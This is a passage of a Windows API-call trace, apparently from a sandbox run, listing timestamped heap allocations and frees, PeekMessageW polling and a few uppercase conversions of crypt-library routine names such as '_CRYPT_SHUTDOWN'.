Flags=0x0, Size=0x10) returned 0x2e51190 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0236.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7b0) returned 0x3bf1590 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0236.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7b0) returned 0x3bf1d48 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf1590 | out: hHeap=0x970000) returned 1 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.732] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0236.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0236.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0236.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0236.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0236.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0236.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.733] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0236.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0236.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0236.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0236.733] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0236.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.733] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0236.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0236.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0236.734] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0236.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0236.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0236.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0236.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0236.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0236.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0236.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0236.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0236.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0236.778] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.779] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0236.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0236.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0236.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0236.779] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0236.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0236.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0236.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0236.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0236.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0236.780] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0236.780] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0236.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0236.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7b0) returned 0x3bf1590 [0236.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7b0) returned 0x3bf2500 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf1590 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0236.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7b0) returned 0x3bf1590 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf2500 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0236.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7b0) returned 0x3bf2500 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf1590 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0236.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56090 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0236.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf1d48 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54050 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0236.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0236.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7b0) returned 0x2e54050 [0236.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf2500 | out: hHeap=0x970000) returned 1 [0236.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0236.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0236.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0236.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 